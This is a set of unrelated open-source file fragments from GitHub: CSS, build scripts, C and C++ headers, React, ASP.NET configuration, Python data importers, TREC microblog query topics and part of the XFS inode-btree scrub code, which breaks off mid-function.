!important; } .dd-dragel .dd2-handle[class*="btn-"] { border-color:transparent; border-right-color:#EEE; } .dd2-handle.btn-yellow { text-shadow:none !important; background:rgba(0,0,0,0.05) !important; border-right:1px solid #FFF; } .dd2-handle.btn-yellow:hover { background:rgba(0,0,0,0.08) !important; } .dd-dragel .dd2-handle.btn-yellow { border-color:transparent; border-right-color:#FFF; } .dd-item > .dd2-handle .drag-icon { display:none; } .dd-dragel > .dd-item > .dd2-handle .drag-icon { display:inline; } .dd-dragel > .dd-item > .dd2-handle .normal-icon { display:none; } } .enable_plugin_nestable_list();
{ "pile_set_name": "Github" }
BIND=../../../../bin SRCD=../.. SRCF=$(basename $2 .rom) redo-ifchange $BIND/a redo-ifchange $SRCD/asrt.i $SRCD/asrt.asm redo-ifchange $SRCD/dict.asm a from $SRCF.asm to $3 quiet
{ "pile_set_name": "Github" }
/* Matrix_and_Pitch.h * * Copyright (C) 1992-2011,2015 Paul Boersma * * This code is free software; you can redistribute it and/or modify * it under the terms of the GNU General Public License as published by * the Free Software Foundation; either version 2 of the License, or (at * your option) any later version. * * This code is distributed in the hope that it will be useful, but * WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. * See the GNU General Public License for more details. * * You should have received a copy of the GNU General Public License * along with this work. If not, see <http://www.gnu.org/licenses/>. */ #include "Matrix.h" #include "Pitch.h" autoMatrix Pitch_to_Matrix (Pitch me); autoPitch Matrix_to_Pitch (Matrix me); /* End of file Matrix_and_Pitch.h */
{ "pile_set_name": "Github" }
import React from 'react' import { Query } from 'react-apollo' import get from 'lodash/get' import query from 'queries/Network' function withNetwork(WrappedComponent) { const WithNetwork = props => { return ( <Query query={query}> {({ data }) => { return ( <WrappedComponent networkId={get(data, 'web3.networkId')} networkName={get(data, 'web3.networkName')} {...props} /> ) }} </Query> ) } return WithNetwork } export default withNetwork
{ "pile_set_name": "Github" }
<?xml version="1.0"?> <configuration> <configSections> <sectionGroup name="system.web.webPages.razor" type="System.Web.WebPages.Razor.Configuration.RazorWebSectionGroup, System.Web.WebPages.Razor, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35"> <section name="host" type="System.Web.WebPages.Razor.Configuration.HostSection, System.Web.WebPages.Razor, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35" requirePermission="false" /> <section name="pages" type="System.Web.WebPages.Razor.Configuration.RazorPagesSection, System.Web.WebPages.Razor, Version=3.0.0.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35" requirePermission="false" /> </sectionGroup> </configSections> <system.web.webPages.razor> <host factoryType="System.Web.Mvc.MvcWebRazorHostFactory, System.Web.Mvc, Version=5.2.3.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35" /> <pages pageBaseType="System.Web.Mvc.WebViewPage"> <namespaces> <add namespace="System.Web.Mvc" /> <add namespace="System.Web.Mvc.Ajax" /> <add namespace="System.Web.Mvc.Html" /> <add namespace="System.Web.Routing" /> </namespaces> </pages> </system.web.webPages.razor> <appSettings> <add key="webpages:Enabled" value="false" /> </appSettings> <system.web> <httpHandlers> <add path="*" verb="*" type="System.Web.HttpNotFoundHandler"/> </httpHandlers> <!-- Enabling request validation in view pages would cause validation to occur after the input has already been processed by the controller. By default MVC performs request validation before a controller processes the input. To change this behavior apply the ValidateInputAttribute to a controller or action. --> <pages validateRequest="false" pageParserFilterType="System.Web.Mvc.ViewTypeParserFilter, System.Web.Mvc, Version=5.2.3.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35" pageBaseType="System.Web.Mvc.ViewPage, System.Web.Mvc, Version=5.2.3.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35" userControlBaseType="System.Web.Mvc.ViewUserControl, System.Web.Mvc, Version=5.2.3.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35"> <controls> <add assembly="System.Web.Mvc, Version=5.2.3.0, Culture=neutral, PublicKeyToken=31BF3856AD364E35" namespace="System.Web.Mvc" tagPrefix="mvc" /> </controls> </pages> </system.web> <system.webServer> <validation validateIntegratedModeConfiguration="false" /> <handlers> <remove name="BlockViewHandler"/> <add name="BlockViewHandler" path="*" verb="*" preCondition="integratedMode" type="System.Web.HttpNotFoundHandler" /> </handlers> </system.webServer> </configuration>
{ "pile_set_name": "Github" }
"use strict"; function __export(m) { for (var p in m) if (!exports.hasOwnProperty(p)) exports[p] = m[p]; } Object.defineProperty(exports, "__esModule", { value: true }); __export(require("./db"));
{ "pile_set_name": "Github" }
"""Evaluates the baseline performance of grid1 without RL control. Baseline is an actuated traffic light provided by SUMO. """ import numpy as np from flow.core.experiment import Experiment from flow.core.params import TrafficLightParams from flow.benchmarks.grid1 import flow_params from flow.benchmarks.grid1 import N_ROWS from flow.benchmarks.grid1 import N_COLUMNS def grid1_baseline(num_runs, render=True): """Run script for the grid1 baseline. Parameters ---------- num_runs : int number of rollouts the performance of the environment is evaluated over render: bool, optional specifies whether to the gui during execution Returns ------- flow.core.experiment.Experiment class needed to run simulations """ sim_params = flow_params['sim'] env_params = flow_params['env'] # define the traffic light logic tl_logic = TrafficLightParams(baseline=False) phases = [{'duration': '31', 'minDur': '5', 'maxDur': '45', "state": "GrGr"}, {'duration': '2', 'minDur': '2', 'maxDur': '2', "state": "yryr"}, {'duration': '31', 'minDur': '5', 'maxDur': '45', "state": "rGrG"}, {'duration': '2', 'minDur': '2', 'maxDur': '2', "state": "ryry"}] for i in range(N_ROWS*N_COLUMNS): tl_logic.add('center'+str(i), tls_type='actuated', phases=phases, programID=1) # modify the rendering to match what is requested sim_params.render = render # set the evaluation flag to True env_params.evaluate = True flow_params['env'].horizon = env_params.horizon exp = Experiment(flow_params) results = exp.run(num_runs) total_delay = np.mean(results['returns']) return total_delay if __name__ == '__main__': runs = 1 # number of simulations to average over res = grid1_baseline(num_runs=runs, render=False) print('---------') print('The total delay across {} runs is {}'.format(runs, res))
{ "pile_set_name": "Github" }
/** @file GUIDs used as HII FormSet and HII Package list GUID in SecureBootConfigDxe driver. Copyright (c) 2011, Intel Corporation. All rights reserved.<BR> This program and the accompanying materials are licensed and made available under the terms and conditions of the BSD License that accompanies this distribution. The full text of the license may be found at http://opensource.org/licenses/bsd-license.php. THE PROGRAM IS DISTRIBUTED UNDER THE BSD LICENSE ON AN "AS IS" BASIS, WITHOUT WARRANTIES OR REPRESENTATIONS OF ANY KIND, EITHER EXPRESS OR IMPLIED. **/ #ifndef __SECUREBOOT_CONFIG_HII_GUID_H__ #define __SECUREBOOT_CONFIG_HII_GUID_H__ #define SECUREBOOT_CONFIG_FORM_SET_GUID \ { \ 0x5daf50a5, 0xea81, 0x4de2, {0x8f, 0x9b, 0xca, 0xbd, 0xa9, 0xcf, 0x5c, 0x14} \ } extern EFI_GUID gSecureBootConfigFormSetGuid; #endif
{ "pile_set_name": "Github" }
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html><head><title></title> <meta http-equiv="Content-Type" content="text/xhtml;charset=UTF-8"/> <meta name="generator" content="Doxygen 1.8.8"/> <link rel="stylesheet" type="text/css" href="search.css"/> <script type="text/javascript" src="all_1.js"></script> <script type="text/javascript" src="search.js"></script> </head> <body class="SRPage"> <div id="SRIndex"> <div class="SRStatus" id="Loading">Loading...</div> <div id="SRResults"></div> <script type="text/javascript"><!-- createResults(); --></script> <div class="SRStatus" id="Searching">Searching...</div> <div class="SRStatus" id="NoMatches">No Matches</div> <script type="text/javascript"><!-- document.getElementById("Loading").style.display="none"; document.getElementById("NoMatches").style.display="none"; var searchResults = new SearchResults("searchResults"); searchResults.Search(); --></script> </div> </body> </html>
{ "pile_set_name": "Github" }
<top> <num> Number: MB001 </num> <title> BBC World Service staff cuts </title> <querytime> Tue Feb 08 12:30:27 +0000 2011 </querytime> <querytweettime> 34952194402811904 </querytweettime> </top> <top> <num> Number: MB002 </num> <title> 2022 FIFA soccer </title> <querytime> Tue Feb 08 18:51:44 +0000 2011 </querytime> <querytweettime> 35048150574039040 </querytweettime> </top> <top> <num> Number: MB003 </num> <title> Haiti Aristide return </title> <querytime> Tue Feb 08 21:32:13 +0000 2011 </querytime> <querytweettime> 35088534306033665 </querytweettime> </top> <top> <num> Number: MB004 </num> <title> Mexico drug war </title> <querytime> Wed Feb 02 17:22:14 +0000 2011 </querytime> <querytweettime> 32851298193768448 </querytweettime> </top> <top> <num> Number: MB005 </num> <title> NIST computer security </title> <querytime> Fri Feb 04 17:44:09 +0000 2011 </querytime> <querytweettime> 33581589627666432 </querytweettime> </top> <top> <num> Number: MB006 </num> <title> NSA </title> <querytime> Tue Feb 08 16:00:59 +0000 2011 </querytime> <querytweettime> 35005178885181441 </querytweettime> </top> <top> <num> Number: MB007 </num> <title> Pakistan diplomat arrest murder </title> <querytime> Tue Feb 08 22:56:33 +0000 2011 </querytime> <querytweettime> 35109758973255680 </querytweettime> </top> <top> <num> Number: MB008 </num> <title> phone hacking British politicians </title> <querytime> Mon Feb 07 17:42:59 +0000 2011 </querytime> <querytweettime> 34668458591395840 </querytweettime> </top> <top> <num> Number: MB009 </num> <title> Toyota Recall </title> <querytime> Tue Feb 08 21:41:26 +0000 2011 </querytime> <querytweettime> 35090855064764416 </querytweettime> </top> <top> <num> Number: MB010 </num> <title> Egyptian protesters attack museum </title> <querytime> Sat Jan 29 20:06:35 +0000 2011 </querytime> <querytweettime> 31443107291598848 </querytweettime> </top> <top> <num> Number: MB011 </num> <title> Kubica crash </title> <querytime> Sun Feb 06 10:38:43 +0000 2011 </querytime> <querytweettime> 34199299428581376 </querytweettime> </top> <top> <num> Number: MB012 </num> <title> Assange Nobel peace nomination </title> <querytime> Mon Jan 31 21:02:33 +0000 2011 </querytime> <querytweettime> 32181966761631744 </querytweettime> </top> <top> <num> Number: MB013 </num> <title> Oprah Winfrey half-sister </title> <querytime> Mon Jan 24 15:43:41 +0000 2011 </querytime> <querytweettime> 29565006546735104 </querytweettime> </top> <top> <num> Number: MB014 </num> <title> release of "The Rite" </title> <querytime> Wed Feb 02 12:31:02 +0000 2011 </querytime> <querytweettime> 32778015167479808 </querytweettime> </top> <top> <num> Number: MB015 </num> <title> Thorpe return in 2012 Olympics </title> <querytime> Sun Jan 30 12:20:25 +0000 2011 </querytime> <querytweettime> 31688182005235712 </querytweettime> </top> <top> <num> Number: MB016 </num> <title> release of "Known and Unknown" </title> <querytime> Mon Jan 24 17:03:52 +0000 2011 </querytime> <querytweettime> 29585186899365888 </querytweettime> </top> <top> <num> Number: MB017 </num> <title> White Stripes breakup </title> <querytime> Wed Feb 02 19:13:40 +0000 2011 </querytime> <querytweettime> 32879343399084032 </querytweettime> </top> <top> <num> Number: MB018 </num> <title> William and Kate fax save-the-date </title> <querytime> Wed Jan 26 08:59:32 +0000 2011 </querytime> <querytweettime> 30188073790742528 </querytweettime> </top> <top> <num> Number: MB019 </num> <title> Cuomo budget cuts </title> <querytime> Mon Feb 07 23:25:02 +0000 2011 </querytime> <querytweettime> 34754540519563264 </querytweettime> </top> <top> <num> Number: MB020 </num> <title> Taco Bell filling lawsuit </title> <querytime> Sun Feb 06 07:09:20 +0000 2011 </querytime> <querytweettime> 34146608102772736 </querytweettime> </top> <top> <num> Number: MB021 </num> <title> Emanuel residency court rulings </title> <querytime> Sat Jan 29 03:03:30 +0000 2011 </querytime> <querytweettime> 31185639047172097 </querytweettime> </top> <top> <num> Number: MB022 </num> <title> healthcare law unconstitutional </title> <querytime> Tue Feb 01 22:17:34 +0000 2011 </querytime> <querytweettime> 32563233118224385 </querytweettime> </top> <top> <num> Number: MB023 </num> <title> Amtrak train service </title> <querytime> Tue Feb 08 20:04:25 +0000 2011 </querytime> <querytweettime> 35066441501900800 </querytweettime> </top> <top> <num> Number: MB024 </num> <title> Super Bowl, seats </title> <querytime> Tue Feb 08 17:11:04 +0000 2011 </querytime> <querytweettime> 35022813232373760 </querytweettime> </top> <top> <num> Number: MB025 </num> <title> TSA airport screening </title> <querytime> Thu Feb 03 19:52:09 +0000 2011 </querytime> <querytweettime> 33251413001764864 </querytweettime> </top> <top> <num> Number: MB026 </num> <title> US unemployment </title> <querytime> Fri Feb 04 14:10:51 +0000 2011 </querytime> <querytweettime> 33527910379814912 </querytweettime> </top> <top> <num> Number: MB027 </num> <title> reduce energy consumption </title> <querytime> Fri Feb 04 04:19:58 +0000 2011 </querytime> <querytweettime> 33379210437337088 </querytweettime> </top> <top> <num> Number: MB028 </num> <title> Detroit Auto Show </title> <querytime> Wed Jan 26 22:46:12 +0000 2011 </querytime> <querytweettime> 30396111764066304 </querytweettime> </top> <top> <num> Number: MB029 </num> <title> global warming and weather </title> <querytime> Tue Feb 08 01:05:57 +0000 2011 </querytime> <querytweettime> 34779934836785152 </querytweettime> </top> <top> <num> Number: MB030 </num> <title> Keith Olbermann new job </title> <querytime> Tue Feb 08 22:51:01 +0000 2011 </querytime> <querytweettime> 35108366829232128 </querytweettime> </top> <top> <num> Number: MB031 </num> <title> Special Olympics athletes </title> <querytime> Fri Feb 04 08:44:02 +0000 2011 </querytime> <querytweettime> 33445664922800129 </querytweettime> </top> <top> <num> Number: MB032 </num> <title> State of the Union and jobs </title> <querytime> Fri Feb 04 02:08:22 +0000 2011 </querytime> <querytweettime> 33346093525762048 </querytweettime> </top> <top> <num> Number: MB033 </num> <title> Dog Whisperer Cesar Millan's techniques </title> <querytime> Thu Jan 27 19:27:54 +0000 2011 </querytime> <querytweettime> 30708594202648576 </querytweettime> </top> <top> <num> Number: MB034 </num> <title> MSNBC Rachel Maddow </title> <querytime> Fri Feb 04 22:42:20 +0000 2011 </querytime> <querytweettime> 33656631187210241 </querytweettime> </top> <top> <num> Number: MB035 </num> <title> Sargent Shriver tributes </title> <querytime> Mon Jan 24 07:18:17 +0000 2011 </querytime> <querytweettime> 29437816727404544 </querytweettime> </top> <top> <num> Number: MB036 </num> <title> Moscow airport bombing </title> <querytime> Mon Jan 24 23:00:35 +0000 2011 </querytime> <querytweettime> 29674954899333120 </querytweettime> </top> <top> <num> Number: MB037 </num> <title> Giffords' recovery </title> <querytime> Thu Feb 03 18:05:03 +0000 2011 </querytime> <querytweettime> 33224462191038464 </querytweettime> </top> <top> <num> Number: MB038 </num> <title> protests in Jordan </title> <querytime> Tue Feb 01 12:46:40 +0000 2011 </querytime> <querytweettime> 32419560749531136 </querytweettime> </top> <top> <num> Number: MB039 </num> <title> Egyptian curfew </title> <querytime> Fri Jan 28 18:14:09 +0000 2011 </querytime> <querytweettime> 31052423128686592 </querytweettime> </top> <top> <num> Number: MB040 </num> <title> Beck attacks Piven </title> <querytime> Mon Jan 31 20:33:37 +0000 2011 </querytime> <querytweettime> 32174687102435328 </querytweettime> </top> <top> <num> Number: MB041 </num> <title> Obama birth certificate </title> <querytime> Mon Jan 31 17:55:54 +0000 2011 </querytime> <querytweettime> 32134993337647104 </querytweettime> </top> <top> <num> Number: MB042 </num> <title> Holland Iran envoy recall </title> <querytime> Mon Feb 07 20:47:13 +0000 2011 </querytime> <querytweettime> 34714824982134784 </querytweettime> </top> <top> <num> Number: MB043 </num> <title> Kucinich olive pit lawsuit </title> <querytime> Sat Jan 29 08:06:05 +0000 2011 </querytime> <querytweettime> 31261786745339904 </querytweettime> </top> <top> <num> Number: MB044 </num> <title> White House spokesman replaced </title> <querytime> Fri Jan 28 13:35:45 +0000 2011 </querytime> <querytweettime> 30982361281728512 </querytweettime> </top> <top> <num> Number: MB045 </num> <title> political campaigns and social media </title> <querytime> Tue Feb 01 12:52:29 +0000 2011 </querytime> <querytweettime> 32421023961841667 </querytweettime> </top> <top> <num> Number: MB046 </num> <title> Bottega Veneta </title> <querytime> Tue Feb 08 22:34:59 +0000 2011 </querytime> <querytweettime> 35104330025541632 </querytweettime> </top> <top> <num> Number: MB047 </num> <title> organic farming requirements </title> <querytime> Tue Feb 08 00:12:47 +0000 2011 </querytime> <querytweettime> 34766556445540352 </querytweettime> </top> <top> <num> Number: MB048 </num> <title> Egyptian evacuation </title> <querytime> Mon Jan 31 09:36:57 +0000 2011 </querytime> <querytweettime> 32009428471386112 </querytweettime> </top> <top> <num> Number: MB049 </num> <title> carbon monoxide law </title> <querytime> Tue Feb 01 22:44:23 +0000 2011 </querytime> <querytweettime> 32569981321347074 </querytweettime> </top> <top> <num> Number: MB050 </num> <title> war prisoners, Hatch Act </title> <querytime> Tue Jan 25 02:13:11 +0000 2011 </querytime> <querytweettime> 29723425576587264 </querytweettime> </top>
{ "pile_set_name": "Github" }
"""Class for importing monitoring FIT files into a database.""" __author__ = "Tom Goetz" __copyright__ = "Copyright Tom Goetz" __license__ = "GPL" import sys import logging from tqdm import tqdm import Fit from utilities import FileProcessor from fit_file_processor import FitFileProcessor logger = logging.getLogger(__file__) logger.addHandler(logging.StreamHandler(stream=sys.stdout)) root_logger = logging.getLogger() class FitData(object): """Class for importing FIT files into a database.""" def __init__(self, input_dir, ignore_dev_fields, debug, latest=False, recursive=False, fit_types=None, measurement_system=Fit.field_enums.DisplayMeasure.metric): """ Return an instance of FitData. Parameters: input_dir (string): directory (full path) to check for monitoring data files debug (Boolean): enable debug logging latest (Boolean): check for latest files only fit_types (Fit.field_enums.FileType): check for this file type only measurement_system (enum): which measurement system to use when importing the files """ logger.info("Processing %s FIT data from %s", fit_types, input_dir) self.measurement_system = measurement_system self.ignore_dev_fields = ignore_dev_fields self.debug = debug self.fit_types = fit_types self.file_names = FileProcessor.dir_to_files(input_dir, Fit.file.name_regex, latest, recursive) def file_count(self): """Return the number of files that will be processed.""" return len(self.file_names) def process_files(self, db_params): """Import FIT files into the database.""" fp = FitFileProcessor(db_params, self.ignore_dev_fields, self.debug) for file_name in tqdm(self.file_names, unit='files'): try: fit_file = Fit.file.File(file_name, self.measurement_system) if self.fit_types is None or fit_file.type in self.fit_types: fp.write_file(fit_file) root_logger.info("Wrote Fit file %s type %s to the database", file_name, fit_file.type) else: root_logger.info("skipping non-matching %s file %s type %r message types %r", self.fit_types, file_name, fit_file.type, fit_file.message_types) except Exception as e: logger.error("Failed to parse %s: %s", file_name, e) root_logger.error("Failed to parse %s: %s", file_name, e)
{ "pile_set_name": "Github" }
[ { "type": "api-change", "category": "CloudFront", "description": "You can now specify additional options for MinimumProtocolVersion, which controls the SSL\/TLS protocol that CloudFront uses to communicate with viewers. The minimum protocol version that you choose also determines the ciphers that CloudFront uses to encrypt the content that it returns to viewers." }, { "type": "api-change", "category": "EC2", "description": "You are now able to create and launch EC2 P3 instance, next generation GPU instances, optimized for machine learning and high performance computing applications. With up to eight NVIDIA Tesla V100 GPUs, P3 instances provide up to one petaflop of mixed-precision, 125 teraflops of single-precision, and 62 teraflops of double-precision floating point performance, as well as a 300 GB\/s second-generation NVLink interconnect that enables high-speed, low-latency GPU-to-GPU communication. P3 instances also feature up to 64 vCPUs based on custom Intel Xeon E5 (Broadwell) processors, 488 GB of DRAM, and 25 Gbps of dedicated aggregate network bandwidth using the Elastic Network Adapter (ENA)." } ]
{ "pile_set_name": "Github" }
<div style="margin:15px; "> <form method="post" action="#{ActionLink}"> <div>#{cssForm}</div> </form> </div>
{ "pile_set_name": "Github" }
/* * Copyright 2020 The WebRTC Project Authors. All rights reserved. * * Use of this source code is governed by a BSD-style license * that can be found in the LICENSE file in the root of the source * tree. An additional intellectual property rights grant can be found * in the file PATENTS. All contributing project authors may * be found in the AUTHORS file in the root of the source tree. */ #include "rtc_base/network_route.h" namespace rtc { bool RouteEndpoint::operator==(const RouteEndpoint& other) const { return adapter_type_ == other.adapter_type_ && adapter_id_ == other.adapter_id_ && network_id_ == other.network_id_ && uses_turn_ == other.uses_turn_; } bool NetworkRoute::operator==(const NetworkRoute& other) const { return connected == other.connected && local == other.local && remote == other.remote && packet_overhead == other.packet_overhead && last_sent_packet_id == other.last_sent_packet_id; } } // namespace rtc
{ "pile_set_name": "Github" }
// SPDX-License-Identifier: GPL-2.0+ /* * Copyright (C) 2017 Oracle. All Rights Reserved. * Author: Darrick J. Wong <[email protected]> */ #include "xfs.h" #include "xfs_fs.h" #include "xfs_shared.h" #include "xfs_format.h" #include "xfs_trans_resv.h" #include "xfs_mount.h" #include "xfs_defer.h" #include "xfs_btree.h" #include "xfs_bit.h" #include "xfs_log_format.h" #include "xfs_trans.h" #include "xfs_sb.h" #include "xfs_inode.h" #include "xfs_alloc.h" #include "xfs_ialloc.h" #include "xfs_ialloc_btree.h" #include "xfs_icache.h" #include "xfs_rmap.h" #include "xfs_log.h" #include "xfs_trans_priv.h" #include "scrub/xfs_scrub.h" #include "scrub/scrub.h" #include "scrub/common.h" #include "scrub/btree.h" #include "scrub/trace.h" /* * Set us up to scrub inode btrees. * If we detect a discrepancy between the inobt and the inode, * try again after forcing logged inode cores out to disk. */ int xfs_scrub_setup_ag_iallocbt( struct xfs_scrub_context *sc, struct xfs_inode *ip) { return xfs_scrub_setup_ag_btree(sc, ip, sc->try_harder); } /* Inode btree scrubber. */ /* * If we're checking the finobt, cross-reference with the inobt. * Otherwise we're checking the inobt; if there is an finobt, make sure * we have a record or not depending on freecount. */ static inline void xfs_scrub_iallocbt_chunk_xref_other( struct xfs_scrub_context *sc, struct xfs_inobt_rec_incore *irec, xfs_agino_t agino) { struct xfs_btree_cur **pcur; bool has_irec; int error; if (sc->sm->sm_type == XFS_SCRUB_TYPE_FINOBT) pcur = &sc->sa.ino_cur; else pcur = &sc->sa.fino_cur; if (!(*pcur)) return; error = xfs_ialloc_has_inode_record(*pcur, agino, agino, &has_irec); if (!xfs_scrub_should_check_xref(sc, &error, pcur)) return; if (((irec->ir_freecount > 0 && !has_irec) || (irec->ir_freecount == 0 && has_irec))) xfs_scrub_btree_xref_set_corrupt(sc, *pcur, 0); } /* Cross-reference with the other btrees. */ STATIC void xfs_scrub_iallocbt_chunk_xref( struct xfs_scrub_context *sc, struct xfs_inobt_rec_incore *irec, xfs_agino_t agino, xfs_agblock_t agbno, xfs_extlen_t len) { struct xfs_owner_info oinfo; if (sc->sm->sm_flags & XFS_SCRUB_OFLAG_CORRUPT) return; xfs_scrub_xref_is_used_space(sc, agbno, len); xfs_scrub_iallocbt_chunk_xref_other(sc, irec, agino); xfs_rmap_ag_owner(&oinfo, XFS_RMAP_OWN_INODES); xfs_scrub_xref_is_owned_by(sc, agbno, len, &oinfo); xfs_scrub_xref_is_not_shared(sc, agbno, len); } /* Is this chunk worth checking? */ STATIC bool xfs_scrub_iallocbt_chunk( struct xfs_scrub_btree *bs, struct xfs_inobt_rec_incore *irec, xfs_agino_t agino, xfs_extlen_t len) { struct xfs_mount *mp = bs->cur->bc_mp; xfs_agnumber_t agno = bs->cur->bc_private.a.agno; xfs_agblock_t bno; bno = XFS_AGINO_TO_AGBNO(mp, agino); if (bno + len <= bno || !xfs_verify_agbno(mp, agno, bno) || !xfs_verify_agbno(mp, agno, bno + len - 1)) xfs_scrub_btree_set_corrupt(bs->sc, bs->cur, 0); xfs_scrub_iallocbt_chunk_xref(bs->sc, irec, agino, bno, len); return true; } /* Count the number of free inodes. */ static unsigned int xfs_scrub_iallocbt_freecount( xfs_inofree_t freemask) { BUILD_BUG_ON(sizeof(freemask) != sizeof(__u64)); return hweight64(freemask); } /* Check a particular inode with ir_free. */ STATIC int xfs_scrub_iallocbt_check_cluster_freemask( struct xfs_scrub_btree *bs, xfs_ino_t fsino, xfs_agino_t chunkino, xfs_agino_t clusterino, struct xfs_inobt_rec_incore *irec, struct xfs_buf *bp) { struct xfs_dinode *dip; struct xfs_mount *mp = bs->cur->bc_mp; bool inode_is_free = false; bool freemask_ok; bool inuse; int error = 0; if (xfs_scrub_should_terminate(bs->sc, &error)) return error; dip = xfs_buf_offset(bp, clusterino * mp->m_sb.sb_inodesize); if (be16_to_cpu(dip->di_magic) != XFS_DINODE_MAGIC || (dip->di_version >= 3 && be64_to_cpu(dip->di_ino) != fsino + clusterino)) { xfs_scrub_btree_set_corrupt(bs->sc, bs->cur, 0); goto out; } if (irec->ir_free & XFS_INOBT_MASK(chunkino + clusterino)) inode_is_free = true; error = xfs_icache_inode_is_allocated(mp, bs->cur->bc_tp, fsino + clusterino, &inuse); if (error == -ENODATA) { /* Not cached, just read the disk buffer */ freemask_ok = inode_is_free ^ !!(dip->di_mode); if (!bs->sc->try_harder && !freemask_ok) return -EDEADLOCK; } else if (error < 0) { /* * Inode is only half assembled, or there was an IO error, * or the verifier failed, so don't bother trying to check. * The inode scrubber can deal with this. */ goto out; } else { /* Inode is all there. */ freemask_ok = inode_is_free ^ inuse; } if (!freemask_ok) xfs_scrub_btree_set_corrupt(bs->sc, bs->cur, 0); out: return 0; } /* Make sure the free mask is consistent with what the inodes think. */ STATIC int xfs_scrub_iallocbt_check_freemask( struct xfs_scrub_btree *bs, struct xfs_inobt_rec_incore *irec) { struct xfs_owner_info oinfo; struct xfs_imap imap; struct xfs_mount *mp = bs->cur->bc_mp; struct xfs_dinode *dip; struct xfs_buf *bp; xfs_ino_t fsino; xfs_agino_t nr_inodes; xfs_agino_t agino; xfs_agino_t chunkino; xfs_agino_t clusterino; xfs_agblock_t agbno; int blks_per_cluster; uint16_t holemask; uint16_t ir_holemask; int error = 0; /* Make sure the freemask matches the inode records. */ blks_per_cluster = xfs_icluster_size_fsb(mp); nr_inodes = XFS_OFFBNO_TO_AGINO(mp, blks_per_cluster, 0); xfs_rmap_ag_owner(&oinfo, XFS_RMAP_OWN_INODES); for (agino = irec->ir_startino; agino < irec->ir_startino + XFS_INODES_PER_CHUNK; agino += blks_per_cluster * mp->m_sb.sb_inopblock) { fsino = XFS_AGINO_TO_INO(mp, bs->cur->bc_private.a.agno, agino); chunkino = agino - irec->ir_startino; agbno = XFS_AGINO_TO_AGBNO(mp, agino); /* Compute the holemask mask for this cluster. */ for (clusterino = 0, holemask = 0; clusterino < nr_inodes; clusterino += XFS_INODES_PER_HOLEMASK_BIT) holemask |= XFS_INOBT_MASK((chunkino + clusterino) / XFS_INODES_PER_HOLEMASK_BIT); /* The whole cluster must be a hole or not a hole. */ ir_holemask = (irec->ir_holemask & holemask); if (ir_holemask != holemask && ir_holemask != 0) { xfs_scrub_btree_set_corrupt(bs->sc, bs->cur, 0); continue; } /* If any part of this is a hole, skip it. */ if (ir_holemask) { xfs_scrub_xref_is_not_owned_by(bs->sc, agbno, blks_per_cluster, &oinfo); continue; } xfs_scrub_xref_is_owned_by(bs->sc, agbno, blks_per_cluster, &oinfo); /* Grab the inode cluster buffer. */ imap.im_blkno = XFS_AGB_TO_DADDR(mp, bs->cur->bc_private.a.agno, agbno); imap.im_len = XFS_FSB_TO_BB(mp, blks_per_cluster); imap.im_boffset = 0; error = xfs_imap_to_bp(mp, bs->cur->bc_tp, &imap, &dip, &bp, 0, 0); if (!xfs_scrub_btree_xref_process_error(bs->sc, bs->cur, 0, &error)) continue; /* Which inodes are free? */ for (clusterino = 0; clusterino < nr_inodes; clusterino++) { error = xfs_scrub_iallocbt_check_cluster_freemask(bs, fsino, chunkino, clusterino, irec, bp); if (error) { xfs_trans_brelse(bs->cur->bc_tp, bp); return error; } } xfs_trans_brelse(bs->cur->bc_tp, bp); } return error; } /* Scrub an inobt/finobt record. */ STATIC int xfs_scrub_iallocbt_rec( struct xfs_scrub_btree *bs, union xfs_btree_rec *rec) { struct xfs_mount *mp = bs->cur->bc_mp; xfs_filblks_t *inode_blocks = bs->private; struct xfs_inobt_rec_incore irec; uint64_t holes; xfs_agnumber_t agno = bs->cur->bc_private.a.agno; xfs_agino_t agino; xfs_agblock_t agbno; xfs_extlen_t len; int holecount; int i; int error = 0; unsigned int real_freecount; uint16_t holemask; xfs_inobt_btrec_to_irec(mp, rec, &irec); if (irec.ir_count > XFS_INODES_PER_CHUNK || irec.ir_freecount > XFS_INODES_PER_CHUNK) xfs_scrub_btree_set_corrupt(bs->sc, bs->cur, 0); real_freecount = irec.ir_freecount + (XFS_INODES_PER_CHUNK - irec.ir_count); if (real_freecount != xfs_scrub_iallocbt_freecount(irec.ir_free)) xfs_scrub_btree_set_corrupt(bs->sc, bs->cur, 0); agino = irec.ir_startino; /* Record has to be properly aligned within the AG. */ if (!xfs_verify_agino(mp, agno, agino) || !xfs_verify_agino(mp, agno, agino + XFS_INODES_PER_CHUNK - 1)) { xfs_scrub_btree_set_corrupt(bs->sc, bs->cur, 0); goto out; } /* Make sure this record is aligned to cluster and inoalignmnt size. */ agbno = XFS_AGINO_TO_AGBNO(mp, irec.ir_startino); if ((agbno & (xfs_ialloc_cluster_alignment(mp) - 1)) || (agbno & (xfs_icluster_size_fsb(mp) - 1))) xfs_scrub_btree_set_corrupt(bs->sc, bs->cur, 0); *inode_blocks += XFS_B_TO_FSB(mp, irec.ir_count * mp->m_sb.sb_inodesize); /* Handle non-sparse inodes */ if (!xfs_inobt_issparse(irec.ir_holemask)) { len = XFS_B_TO_FSB(mp, XFS_INODES_PER_CHUNK * mp->m_sb.sb_inodesize); if (irec.ir_count != XFS_INODES_PER_CHUNK) xfs_scrub_btree_set_corrupt(bs->sc, bs->cur, 0); if (!xfs_scrub_iallocbt_chunk(bs, &irec, agino, len)) goto out; goto check_freemask; } /* Check each chunk of a sparse inode cluster. */ holemask = irec.ir_holemask; holecount = 0; len = XFS_B_TO_FSB(mp, XFS_INODES_PER_HOLEMASK_BIT * mp->m_sb.sb_inodesize); holes = ~xfs_inobt_irec_to_allocmask(&irec); if ((holes & irec.ir_free) != holes || irec.ir_freecount > irec.ir_count) xfs_scrub_btree_set_corrupt(bs->sc, bs->cur, 0); for (i = 0; i < XFS_INOBT_HOLEMASK_BITS; i++) { if (holemask & 1) holecount += XFS_INODES_PER_HOLEMASK_BIT; else if 